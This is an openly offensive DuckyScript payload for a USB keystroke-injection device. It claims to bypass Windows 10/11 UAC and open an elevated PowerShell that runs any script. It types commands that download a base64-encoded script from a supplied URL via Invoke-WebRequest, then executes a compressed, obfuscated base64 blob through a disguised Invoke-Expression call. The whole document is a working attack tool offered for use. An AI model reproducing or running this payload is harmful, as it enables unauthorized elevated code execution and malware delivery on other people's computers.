1
REM     Title: UrAttaControl
2

3
REM     Author: I am Jakoby
4

5
REM     Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
6
REM     Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
7

8
REM     Target: Windows 10, 11
9

10
REM	  NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
11
REM     EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA="		- This Base64 script will open notepad
12

13
REM     You can use this function I wrote to convert your .ps1 sscripts to Base64
14
REM     https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md	
15

16
GUI r
17
DELAY 500
18
STRING powershell 
19
ENTER
20

21
DELAY 1000
22

23
STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
24
SHIFT ENTER
25
STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content
26
SHIFT ENTER
27
STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
28
SHIFT ENTER
29
STRING exit
30
ENTER
31

32